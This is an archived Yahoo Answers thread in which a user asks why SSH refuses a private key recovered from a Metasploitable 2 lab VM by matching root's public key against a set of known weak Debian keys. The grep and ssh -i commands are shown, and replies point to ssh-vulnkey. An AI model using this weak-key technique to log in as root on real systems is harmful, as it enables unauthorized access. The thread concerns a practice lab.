Question:
Security exploit question SSH?
?
2013-06-20 19:49:06 UTC
ok so i have gained access to a vulnerable linux box (metasploitable 2 VM) from there I donwloaded the id_rsa.pub form the .ssh directory. downloaded the public keys to brute force them.

so i ran this command

cd /rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

and got this:

57c3115d77c56390332dc5c49978627a-5429.pub

so why wont it work when i try to connect like this:

ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.179.128 ??????

The error i get is:

Public key 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a blacklisted (see ssh-vulnkey(1)); refusing to send it
root@192.168.179.128's password:

This worked before when i did it on one of my other linux VM's
Three answers:
ratter_of_the_shire
2013-06-20 22:24:57 UTC
did you read the mentioned man file (ssh-vulnkey(1)) ?
morein
2016-12-11 13:10:11 UTC
Ssh-vulnkey
potatocouch
2013-06-20 23:01:06 UTC
sudo ssh-vulnkey -a

will determine if the keys are compromised. if they are you need to regenerate them.


This content was originally posted on Y! Answers, a Q&A website that shut down in 2021.
Loading...